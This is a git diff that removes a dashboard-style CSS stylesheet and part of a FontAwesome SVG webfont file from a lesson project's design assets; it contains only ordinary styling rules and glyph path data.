Removed all lesson specific source and resources

newDesign/assets/css/main.css

@@ -1,760 +0,0 @@
-/* ==========================================================================
-   Base styles
-   ========================================================================== */
-body {
-  color: #5D5F63;
-  background: #212121;
-  font-family: 'Open Sans', sans-serif;
-  padding: 0px;
-  margin: 0px;
-  text-rendering: optimizeLegibility;
-  -webkit-font-smoothing: antialiased;
-}
-a:link,
-a:visited {
-  text-decoration: none;
-  outline: none;
-  color: #e84c3d;
-}
-a:hover,
-a:active {
-  outline: none;
-  text-decoration: none;
-  color: #16a086;
-}
-h1,
-h2,
-h3,
-h4,
-h5,
-h6 {
-  font-family: 'Source Sans Pro', Arial, sans-serif;
-}
-p {
-  font-size: 14px;
-}
-hr {
-  margin-top: 10px;
-  margin-bottom: 10px;
-}
-img {
-  max-width: 100%;
-}
-::selection {
-  background: #fff7dd;
-}
-::-moz-selection {
-  background: #fff7dd;
-}
-/* ==========================================================================
-   Layout
-   ========================================================================== */
-#container {
-  width: 100%;
-  height: 100%;
-  z-index: 0;
-  -webkit-transition: all 0.3s ease-in-out;
-  -moz-transition: all 0.3s ease-in-out;
-  -o-transition: all 0.3s ease-in-out;
-  -ms-transition: all 0.3s ease-in-out;
-  transition: all 0.3s ease-in-out;
-}
-/* Header */
-#header {
-  z-index: 200;
-  background: #fff;
-  min-height: 80px;
-  -webkit-transition: all 0.3s ease-in-out;
-  -moz-transition: all 0.3s ease-in-out;
-  -o-transition: all 0.3s ease-in-out;
-  -ms-transition: all 0.3s ease-in-out;
-  transition: all 0.3s ease-in-out;
-  margin-right: 0;
-}
-#header .brand {
-  float: left;
-  width: 240px;
-  height: 80px;
-  padding: 0;
-  position: relative;
-  background: url('../img/logoBG.jpg') no-repeat 0px 0px;
-}
-#header .logo {
-  color: #fff;
-  font-size: 1.7em;
-  text-transform: uppercase;
-  padding: 23px 0 0 75px;
-  display: inline-block;
-}
-#header .logo span {
-  font-weight: 700;
-}
-#header .toggle-navigation button:hover,
-#header .toggle-navigation button:active,
-#header button#toggle-mail:hover,
-#header button#toggle-mail:active {
-  background: #e84c3d;
-}
-#header .toggle-navigation button:hover i,
-#header button#toggle-mail:hover i {
-  color: #F6F6F6;
-}
-#header .toggle-navigation.toggle-left {
-  margin-top: 5px;
-  margin-left: 20px;
-  display: inline-block;
-}
-#header .btn-default {
-  padding: 3px 9px;
-  background: #F6F6F6;
-  -webkit-border-radius: 50%;
-  -moz-border-radius: 50%;
-  -ms-border-radius: 50%;
-  -o-border-radius: 50%;
-  border-radius: 50%;
-  width: 35px;
-  height: 35px;
-}
-#header .btn-default .fa-bars,
-#header .btn-default .fa-comment {
-  cursor: pointer;
-  color: #797979;
-}
-#header .btn-default .fa-info,
-#header .btn-default .fa-envelope,
-#header .btn-default .fa-user {
-  color: #797979;	
-}
-#header .user-nav button:hover,
-#header .user-nav button:active {
-  background: #e84c3d;
-}
-#header .user-nav button:hover i {
-  color: #F6F6F6;
-}
-#header .lessonTitle {
-	display: inline-block;
-	margin:0 0 0 20px;	
-}
-#header .pull-right {
-  float: right !important;
-  margin-top:25px;
-  margin-right:20px;
-}
-/* Sidebar */
-.sidebar {
-  width: 240px;
-  height: 100%;
-  background: #222;
-  position: absolute;
-  -webkit-transition: all 0.3s ease-in-out;
-  -moz-transition: all 0.3s ease-in-out;
-  -o-transition: all 0.3s ease-in-out;
-  -ms-transition: all 0.3s ease-in-out;
-  transition: all 0.3s ease-in-out;
-  z-index: 100;
-}
-.sidebar-toggle {
-  margin-left: -240px;
-}
-#leftside-navigation ul,
-#leftside-navigation ul ul {
-  margin: -2px 0 0;
-  padding: 0;
-}
-#leftside-navigation ul li {
-  list-style-type: none;
-  border-bottom: 1px solid rgba(255, 255, 255, 0.05);
-}
-#leftside-navigation ul li a {
-  color: #aeb2b7;
-  text-decoration: none;
-  display: block;
-  padding: 18px 0 18px 25px;
-  font-size: 12px;
-  outline: none;
-  -webkit-transition: all 200ms ease-in;
-  -moz-transition: all 200ms ease-in;
-  -o-transition: all 200ms ease-in;
-  -ms-transition: all 200ms ease-in;
-  transition: all 200ms ease-in;
-}
-#leftside-navigation ul li a span {
-  display: inline-block;
-}
-#leftside-navigation ul ul li {
-  background: #333;
-  margin-bottom: 0;
-  margin-left: 0;
-  margin-right: 0;
-  border-bottom: none;
-}
-#leftside-navigation ul ul li a {
-  font-size: 12px;
-  padding-top: 13px;
-  padding-bottom: 13px;
-  color: #aeb2b7;
-}
-#leftside-navigation ul li a i {
-  width: 20px;
-}
-#leftside-navigation ul li a i.fa-angle-right,
-#leftside-navigation ul li a i.fa-angle-left {
-  padding-top: 3px;
-}
-#leftside-navigation ul ul {
-  display: none;
-}
-#leftside-navigation li.active ul {
-  display: block;
-}
-#leftside-navigation ul li a:hover,
-#leftside-navigation ul li.active > a {
-  color: #e84c3d;
-}
-.btn-primary + .dropdown-menu > li > a:hover,
-.btn-primary + .dropdown-menu > li > a:active {
-  background-color: #16a086;
-}
-
-/* ==========================================================================
-   Main Content 
-   ========================================================================== */
-.main-content-wrapper {
-  margin-left: 240px;
-  margin-right: 0;
-  -webkit-transition: all 0.3s ease-in-out;
-  -moz-transition: all 0.3s ease-in-out;
-  -o-transition: all 0.3s ease-in-out;
-  -ms-transition: all 0.3s ease-in-out;
-  transition: all 0.3s ease-in-out;
-  background: #f1f2f7;
-  min-height: 1000px;
-}
-.main-content-wrapper #main-content {
-  background: url('../img/webBg.png') no-repeat top left;
-  border-top: solid thin #e7e8ec;
-  display: inline-block;
-  padding: 15px 15px 0 15px;
-  width: 100%;
-}
-.main-content-wrapper #main-content .h1 {
-  margin: 0;
-  padding: 0px 10px 40px 10px;
-  float: left;
-  line-height: 10px;
-  font-weight: 300;
-  font-size: 42px;
-  font-family: 'Source Sans Pro', Arial, sans-serif;
-}
-.main-content-toggle-left {
-  margin-left: 0;
-}
-.main-content-toggle-right {
-  margin-right: 240px;
-}
-/* ==========================================================================
-  Buttons
-   ========================================================================== */
-.btn {
-  border: none;
-  font-size: 15px;
-  font-weight: normal;
-  -webkit-border-radius: 3px;
-  -moz-border-radius: 3px;
-  -ms-border-radius: 3px;
-  -o-border-radius: 3px;
-  border-radius: 3px;
-  padding: 8px 14px;
-  margin-bottom: 5px;
-  -webkit-font-smoothing: subpixel-antialiased;
-  -webkit-transition: border 0.25s linear, color 0.25s linear, background-color 0.25s linear;
-  transition: border 0.25s linear, color 0.25s linear, background-color 0.25s linear;
-}
-.btn:hover,
-.btn:focus {
-  outline: none;
-}
-.btn:active,
-.btn.active {
-  outline: none;
-  -webkit-box-shadow: none;
-  box-shadow: none;
-  outline: none!important;
-}
-.btn.disabled,
-.btn[disabled],
-.btn fieldset[disabled] .btn {
-  background-color: #bdc3c7;
-  color: rgba(255, 255, 255, 0.75);
-  opacity: 0.7;
-  filter: alpha(opacity=70);
-}
-/* Default Buttons*/
-.btn-default,
-a.btn-default:link,
-a.btn-default:visited {
-  color: #ffffff;
-  background-color: #bdc3c7;
-  outline: none!important;
-}
-a.btn-default:hover,
-a.btn-default:active {
-  color: #ffffff;
-  background-color: #cbd0d3;
-  border-color: #cbd0d3;
-}
-.btn-default:hover,
-.btn-default:focus,
-.btn-default:active,
-.btn-default.active,
-.open .dropdown-toggle.btn-default {
-  color: #ffffff;
-  background-color: #cbd0d3;
-  border-color: #cbd0d3;
-}
-.btn-default:active,
-.btn-default.active,
-.open .dropdown-toggle.btn-default {
-  background: #bdc3c7;
-  border-color: #bdc3c7;
-}
-.btn-default.disabled,
-.btn-default[disabled],
-fieldset[disabled] .btn-default,
-.btn-default.disabled:hover,
-.btn-default[disabled]:hover,
-fieldset[disabled] .btn-default:hover,
-.btn-default.disabled:focus,
-.btn-default[disabled]:focus,
-fieldset[disabled] .btn-default:focus,
-.btn-default.disabled:active,
-.btn-default[disabled]:active,
-fieldset[disabled] .btn-default:active,
-.btn-default.disabled.active,
-.btn-default[disabled].active,
-fieldset[disabled] .btn-default.active {
-  background-color: #bdc3c7;
-  border-color: #bdc3c7;
-}
-.btn-primary,
-a.btn-primary:link,
-a.btn-primary:visited {
-  color: #fff;
-  background-color: #e84c3d;
-}
-a.btn-primary:hover,
-a.btn-primary:active {
-  color: #ffffff;
-  background-color: #C62F28;
-  border-color: #C62F28;
-}
-.btn-primary:hover,
-.btn-primary:focus,
-.btn-primary:active,
-.btn-primary.active,
-.open .dropdown-toggle.btn-primary {
-  color: #ffffff;
-  background-color: #C62F28;
-  border-color: #C62F28;
-}
-.btn-primary:active,
-.btn-primary.active,
-.open .dropdown-toggle.btn-primary {
-  background: #e84c3d;
-  border-color: #e84c3d;
-}
-.btn-primary.disabled,
-.btn-primary[disabled],
-fieldset[disabled] .btn-primary,
-.btn-primary.disabled:hover,
-.btn-primary[disabled]:hover,
-fieldset[disabled] .btn-primary:hover,
-.btn-primary.disabled:focus,
-.btn-primary[disabled]:focus,
-fieldset[disabled] .btn-primary:focus,
-.btn-primary.disabled:active,
-.btn-primary[disabled]:active,
-fieldset[disabled] .btn-primary:active,
-.btn-primary.disabled.active,
-.btn-primary[disabled].active,
-fieldset[disabled] .btn-primary.active {
-  background-color: #e84c3d;
-  border-color: #e84c3d;
-}
-.btn-info {
-  color: #ffffff;
-  background-color: #3598db;
-}
-.btn-info,
-a.btn-info:link,
-a.btn-info:visited {
-  color: #ffffff;
-  background-color: #3598db;
-}
-a.btn-info:hover,
-a.btn-info:active {
-  color: #ffffff;
-  background-color: #4ba3df;
-}
-.btn-info:hover,
-.btn-info:focus,
-.btn-info:active,
-.btn-info.active,
-.open .dropdown-toggle.btn-info {
-  color: #ffffff;
-  background-color: #4ba3df;
-  border-color: #4ba3df;
-}
-.btn-info:active,
-.btn-info.active,
-.open .dropdown-toggle.btn-info {
-  background: #3598db;
-  border-color: #3598db;
-}
-.btn-info.disabled,
-.btn-info[disabled],
-fieldset[disabled] .btn-info,
-.btn-info.disabled:hover,
-.btn-info[disabled]:hover,
-fieldset[disabled] .btn-info:hover,
-.btn-info.disabled:focus,
-.btn-info[disabled]:focus,
-fieldset[disabled] .btn-info:focus,
-.btn-info.disabled:active,
-.btn-info[disabled]:active,
-fieldset[disabled] .btn-info:active,
-.btn-info.disabled.active,
-.btn-info[disabled].active,
-fieldset[disabled] .btn-info.active {
-  background-color: #3598db;
-  border-color: #3598db;
-}
-.btn-danger {
-  color: #ffffff;
-  background-color: #e84c3d;
-}
-.btn-danger:hover,
-.btn-danger:focus,
-.btn-danger:active,
-.btn-danger.active,
-.open .dropdown-toggle.btn-danger {
-  color: #ffffff;
-  background-color: #eb6154;
-  border-color: #eb6154;
-}
-.btn-danger:active,
-.btn-danger.active,
-.open .dropdown-toggle.btn-danger {
-  background: #eb6154;
-  border-color: #eb6154;
-}
-.btn-danger.disabled,
-.btn-danger[disabled],
-fieldset[disabled] .btn-danger,
-.btn-danger.disabled:hover,
-.btn-danger[disabled]:hover,
-fieldset[disabled] .btn-danger:hover,
-.btn-danger.disabled:focus,
-.btn-danger[disabled]:focus,
-fieldset[disabled] .btn-danger:focus,
-.btn-danger.disabled:active,
-.btn-danger[disabled]:active,
-fieldset[disabled] .btn-danger:active,
-.btn-danger.disabled.active,
-.btn-danger[disabled].active,
-fieldset[disabled] .btn-danger.active {
-  background-color: #e84c3d;
-  border-color: #e84c3d;
-}
-.btn-success {
-  color: #ffffff;
-  background-color: #2dcc70;
-}
-.btn-success:hover,
-.btn-success:focus,
-.btn-success:active,
-.btn-success.active,
-.open .dropdown-toggle.btn-success {
-  color: #ffffff;
-  background-color: #3ed47d;
-  border-color: #3ed47d;
-}
-.btn-success:active,
-.btn-success.active,
-.open .dropdown-toggle.btn-success {
-  background: #2dcc70;
-  border-color: #2dcc70;
-}
-.btn-success.disabled,
-.btn-success[disabled],
-fieldset[disabled] .btn-success,
-.btn-success.disabled:hover,
-.btn-success[disabled]:hover,
-fieldset[disabled] .btn-success:hover,
-.btn-success.disabled:focus,
-.btn-success[disabled]:focus,
-fieldset[disabled] .btn-success:focus,
-.btn-success.disabled:active,
-.btn-success[disabled]:active,
-fieldset[disabled] .btn-success:active,
-.btn-success.disabled.active,
-.btn-success[disabled].active,
-fieldset[disabled] .btn-success.active {
-  background-color: #2dcc70;
-  border-color: #2dcc70;
-}
-.btn-warning {
-  color: #ffffff;
-  background-color: #f1c40f;
-}
-.btn-warning:hover,
-.btn-warning:focus,
-.btn-warning:active,
-.btn-warning.active,
-.open .dropdown-toggle.btn-warning {
-  color: #ffffff;
-  background-color: #f1c40f;
-  border-color: #f1c40f;
-}
-.btn-warning:active,
-.btn-warning.active,
-.open .dropdown-toggle.btn-warning {
-  background: #f2ca27;
-  border-color: #f2ca27;
-}
-.btn-warning.disabled,
-.btn-warning[disabled],
-fieldset[disabled] .btn-warning,
-.btn-warning.disabled:hover,
-.btn-warning[disabled]:hover,
-fieldset[disabled] .btn-warning:hover,
-.btn-warning.disabled:focus,
-.btn-warning[disabled]:focus,
-fieldset[disabled] .btn-warning:focus,
-.btn-warning.disabled:active,
-.btn-warning[disabled]:active,
-fieldset[disabled] .btn-warning:active,
-.btn-warning.disabled.active,
-.btn-warning[disabled].active,
-fieldset[disabled] .btn-warning.active {
-  background-color: #f1c40f;
-  border-color: #f1c40f;
-}
-/* Button Sizes */
-.btn-lg {
-  padding: 10px 16px;
-  font-size: 18px;
-  line-height: 1.33;
-}
-.btn-sm {
-  padding: 5px 10px;
-  font-size: 12px;
-  line-height: 1.5;
-  -webkit-border-radius: 3px;
-  -moz-border-radius: 3px;
-  -ms-border-radius: 3px;
-  -o-border-radius: 3px;
-  border-radius: 3px;
-}
-.btn-xs {
-  padding: 1px 5px;
-  font-size: 12px;
-  line-height: 1.5;
-  -webkit-border-radius: 3px;
-  -moz-border-radius: 3px;
-  -ms-border-radius: 3px;
-  -o-border-radius: 3px;
-  border-radius: 3px;
-}
-/* ==========================================================================
-   Breadcrumbs
-   ========================================================================== */
-.breadcrumb {
-  background: none;
-}
-.breadcrumb > li {
-  font-size: 12px;
-}
-/* ==========================================================================
-   Icons
-   ========================================================================== */
-.fa-hover {
-  margin: 5px 0;
-}
-.fa-hover i {
-  font-size: 14px;
-  margin-right: 5px;
-  width: 20px;
-}
-/* ==========================================================================
-   Panels
-   ========================================================================== */
-.panel {
-  border: none;
-  box-shadow: none;
-  -webkit-border-radius: 3px;
-  -moz-border-radius: 3px;
-  -ms-border-radius: 3px;
-  -o-border-radius: 3px;
-  border-radius: 3px;
-}
-.panel > .panel-heading {
-  font-size: 13px;
-  font-weight: 400;
-  text-transform: uppercase;
-  padding: 15px;
-}
-.panel .actions {
-  position: absolute;
-  right: 30px;
-  top: 18px;
-}
-.panel .actions i {
-  font-size: 1em;
-  margin: 0 3px;
-}
-.panel .actions i:hover {
-  cursor: pointer;
-}
-.panel > .panel-footer {
-  font-size: 13px;
-  font-weight: 400;
-  text-transform: uppercase;
-  padding: 15px;
-}
-.panel-default > .panel-heading {
-  border-color: #eff2f7;
-  background: #fafafa;
-  color: #767676;
-}
-.panel-default .actions i {
-  font-size: 1em;
-  color: #bdc3c7;
-  margin: 0 3px;
-}
-.panel-default .actions i:hover {
-  cursor: pointer;
-  color: #767676;
-}
-.panel-default > .panel-footer {
-  border-color: #eff2f7;
-  background: #fafafa;
-  color: #767676;
-}
-.panel-primary > .panel-heading {
-  color: #fff;
-  background-color: #e84c3d;
-  border-color: #e84c3d;
-}
-.panel-primary {
-  border-color: #e84c3d;
-}
-.panel-primary > .panel-heading a,
-.panel-primary > .panel-heading a:hover {
-  color: #fff;
-}
-.panel-solid-default > .panel-heading,
-.panel-solid-default > .panel-body,
-.panel-solid-default > .panel-footer {
-  background: #bdc3c7;
-  color: #fff;
-  border: none;
-}
-.panel-solid-primary > .panel-heading,
-.panel-solid-primary > .panel-body,
-.panel-solid-primary > .panel-footer {
-  background: #e84c3d;
-  color: #fff;
-  border: none;
-}
-.panel-solid-success > .panel-heading,
-.panel-solid-success > .panel-body,
-.panel-solid-success > .panel-footer {
-  background: #2dcc70;
-  color: #fff;
-  border: none;
-}
-.panel-solid-warning > .panel-heading,
-.panel-solid-warning > .panel-body,
-.panel-solid-warning > .panel-footer {
-  background: #f1c40f;
-  color: #fff;
-  border: none;
-}
-.panel-solid-info > .panel-heading,
-.panel-solid-info > .panel-body,
-.panel-solid-info > .panel-footer {
-  background: #3598db;
-  color: #fff;
-  border: none;
-}
-.panel-solid-danger > .panel-heading,
-.panel-solid-danger > .panel-body,
-.panel-solid-danger > .panel-footer {
-  background: #e84c3d;
-  color: #fff;
-  border: none;
-}
-/* ==========================================================================
-  Modal
-   ========================================================================== */
-.modal-footer .btn + .btn {
-  margin-bottom: 5px;
-}
-.modal .modal-body.modal-scroll {
-  max-height: 350px;
-  overflow-y: auto;
-}
-/* ==========================================================================
-   Media Queries
-   ========================================================================== */
-@media only screen and (max-width: 767px) and (min-width: 480px) {
-  /* Main Content */
-  #main-content .h1 {
-    font-size: 35px;
-  }
-}
-@media only screen and (max-width: 660px) {
-  #header {
-    height: 160px;
-  }
-  #header .brand {
-    width: 100%;
-  }
-  #header .user-nav ul {
-    padding-left: 0;
-  }
-  #header .toggle-navigation.toggle-left {
-    float: left;
-  }
-  .sidebar {
-    margin-left: -240px;
-  }
-  .sidebar-toggle {
-    margin-left: 0;
-    width: 100%;
-  }
-  .main-content-wrapper {
-    margin-left: 0;
-  }
-  .main-content-toggle-left {
-    margin-left: 660px;
-  }
-  .sidebarRight {
-    top: 160px;
-    width: 100%;
-  }
-  .user-nav ul li {
-    font-size: 12px;
-  }
-}
-@media only screen and (max-width: 479px) {
-  /* Main Content */
-  #main-content .h1 {
-    font-size: 22px;
-  }
-  #header .dropdown.messages {
-    display: none;
-  }
-}

newDesign/assets/fonts/fontawesome-webfont.svg

@@ -1,414 +0,0 @@
-<?xml version="1.0" standalone="no"?>
-<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
-<svg xmlns="http://www.w3.org/2000/svg">
-<metadata></metadata>
-<defs>
-<font id="fontawesomeregular" horiz-adv-x="1536" >
-<font-face units-per-em="1792" ascent="1536" descent="-256" />
-<missing-glyph horiz-adv-x="448" />
-<glyph unicode=" "  horiz-adv-x="448" />
-<glyph unicode="&#x09;" horiz-adv-x="448" />
-<glyph unicode="&#xa0;" horiz-adv-x="448" />
-<glyph unicode="&#xa8;" horiz-adv-x="1792" />
-<glyph unicode="&#xa9;" horiz-adv-x="1792" />
-<glyph unicode="&#xae;" horiz-adv-x="1792" />
-<glyph unicode="&#xb4;" horiz-adv-x="1792" />
-<glyph unicode="&#xc6;" horiz-adv-x="1792" />
-<glyph unicode="&#x2000;" horiz-adv-x="768" />
-<glyph unicode="&#x2001;" />
-<glyph unicode="&#x2002;" horiz-adv-x="768" />
-<glyph unicode="&#x2003;" />
-<glyph unicode="&#x2004;" horiz-adv-x="512" />
-<glyph unicode="&#x2005;" horiz-adv-x="384" />
-<glyph unicode="&#x2006;" horiz-adv-x="256" />
-<glyph unicode="&#x2007;" horiz-adv-x="256" />
-<glyph unicode="&#x2008;" horiz-adv-x="192" />
-<glyph unicode="&#x2009;" horiz-adv-x="307" />
-<glyph unicode="&#x200a;" horiz-adv-x="85" />
-<glyph unicode="&#x202f;" horiz-adv-x="307" />
-<glyph unicode="&#x205f;" horiz-adv-x="384" />
-<glyph unicode="&#x2122;" horiz-adv-x="1792" />
-<glyph unicode="&#x221e;" horiz-adv-x="1792" />
-<glyph unicode="&#x2260;" horiz-adv-x="1792" />
-<glyph unicode="&#xe000;" horiz-adv-x="500" d="M0 0z" />
-<glyph unicode="&#xf000;" horiz-adv-x="1792" d="M1699 1350q0 -35 -43 -78l-632 -632v-768h320q26 0 45 -19t19 -45t-19 -45t-45 -19h-896q-26 0 -45 19t-19 45t19 45t45 19h320v768l-632 632q-43 43 -43 78q0 23 18 36.5t38 17.5t43 4h1408q23 0 43 -4t38 -17.5t18 -36.5z" />
-<glyph unicode="&#xf001;" d="M1536 1312v-1120q0 -50 -34 -89t-86 -60.5t-103.5 -32t-96.5 -10.5t-96.5 10.5t-103.5 32t-86 60.5t-34 89t34 89t86 60.5t103.5 32t96.5 10.5q105 0 192 -39v537l-768 -237v-709q0 -50 -34 -89t-86 -60.5t-103.5 -32t-96.5 -10.5t-96.5 10.5t-103.5 32t-86 60.5t-34 89 t34 89t86 60.5t103.5 32t96.5 10.5q105 0 192 -39v967q0 31 19 56.5t49 35.5l832 256q12 4 28 4q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf002;" horiz-adv-x="1664" d="M1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1664 -128q0 -52 -38 -90t-90 -38q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5 t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z" />
-<glyph unicode="&#xf003;" horiz-adv-x="1792" d="M1664 32v768q-32 -36 -69 -66q-268 -206 -426 -338q-51 -43 -83 -67t-86.5 -48.5t-102.5 -24.5h-1h-1q-48 0 -102.5 24.5t-86.5 48.5t-83 67q-158 132 -426 338q-37 30 -69 66v-768q0 -13 9.5 -22.5t22.5 -9.5h1472q13 0 22.5 9.5t9.5 22.5zM1664 1083v11v13.5t-0.5 13 t-3 12.5t-5.5 9t-9 7.5t-14 2.5h-1472q-13 0 -22.5 -9.5t-9.5 -22.5q0 -168 147 -284q193 -152 401 -317q6 -5 35 -29.5t46 -37.5t44.5 -31.5t50.5 -27.5t43 -9h1h1q20 0 43 9t50.5 27.5t44.5 31.5t46 37.5t35 29.5q208 165 401 317q54 43 100.5 115.5t46.5 131.5z M1792 1120v-1088q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1472q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf004;" horiz-adv-x="1792" d="M896 -128q-26 0 -44 18l-624 602q-10 8 -27.5 26t-55.5 65.5t-68 97.5t-53.5 121t-23.5 138q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5q224 0 351 -124t127 -344q0 -221 -229 -450l-623 -600 q-18 -18 -44 -18z" />
-<glyph unicode="&#xf005;" horiz-adv-x="1664" d="M1664 889q0 -22 -26 -48l-363 -354l86 -500q1 -7 1 -20q0 -21 -10.5 -35.5t-30.5 -14.5q-19 0 -40 12l-449 236l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41t49 -41l225 -455 l502 -73q56 -9 56 -46z" />
-<glyph unicode="&#xf006;" horiz-adv-x="1664" d="M1137 532l306 297l-422 62l-189 382l-189 -382l-422 -62l306 -297l-73 -421l378 199l377 -199zM1664 889q0 -22 -26 -48l-363 -354l86 -500q1 -7 1 -20q0 -50 -41 -50q-19 0 -40 12l-449 236l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500 l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41t49 -41l225 -455l502 -73q56 -9 56 -46z" />
-<glyph unicode="&#xf007;" horiz-adv-x="1408" d="M1408 131q0 -120 -73 -189.5t-194 -69.5h-874q-121 0 -194 69.5t-73 189.5q0 53 3.5 103.5t14 109t26.5 108.5t43 97.5t62 81t85.5 53.5t111.5 20q9 0 42 -21.5t74.5 -48t108 -48t133.5 -21.5t133.5 21.5t108 48t74.5 48t42 21.5q61 0 111.5 -20t85.5 -53.5t62 -81 t43 -97.5t26.5 -108.5t14 -109t3.5 -103.5zM1088 1024q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5z" />
-<glyph unicode="&#xf008;" horiz-adv-x="1920" d="M384 -64v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM384 320v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM384 704v128q0 26 -19 45t-45 19h-128 q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1408 -64v512q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-512q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM384 1088v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45 t45 -19h128q26 0 45 19t19 45zM1792 -64v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1408 704v512q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-512q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM1792 320v128 q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1792 704v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1792 1088v128q0 26 -19 45t-45 19h-128q-26 0 -45 -19 t-19 -45v-128q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1920 1248v-1344q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1344q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf009;" horiz-adv-x="1664" d="M768 512v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM768 1280v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM1664 512v-384q0 -52 -38 -90t-90 -38 h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90zM1664 1280v-384q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h512q52 0 90 -38t38 -90z" />
-<glyph unicode="&#xf00a;" horiz-adv-x="1792" d="M512 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 288v-192q0 -40 -28 -68t-68 -28h-320 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28 h320q40 0 68 -28t28 -68zM1792 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1152 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 800v-192 q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf00b;" horiz-adv-x="1792" d="M512 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 288v-192q0 -40 -28 -68t-68 -28h-960 q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h960q40 0 68 -28t28 -68zM512 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 800v-192q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v192q0 40 28 68t68 28 h960q40 0 68 -28t28 -68zM1792 1312v-192q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h960q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf00c;" horiz-adv-x="1792" d="M1671 970q0 -40 -28 -68l-724 -724l-136 -136q-28 -28 -68 -28t-68 28l-136 136l-362 362q-28 28 -28 68t28 68l136 136q28 28 68 28t68 -28l294 -295l656 657q28 28 68 28t68 -28l136 -136q28 -28 28 -68z" />
-<glyph unicode="&#xf00d;" horiz-adv-x="1408" d="M1298 214q0 -40 -28 -68l-136 -136q-28 -28 -68 -28t-68 28l-294 294l-294 -294q-28 -28 -68 -28t-68 28l-136 136q-28 28 -28 68t28 68l294 294l-294 294q-28 28 -28 68t28 68l136 136q28 28 68 28t68 -28l294 -294l294 294q28 28 68 28t68 -28l136 -136q28 -28 28 -68 t-28 -68l-294 -294l294 -294q28 -28 28 -68z" />
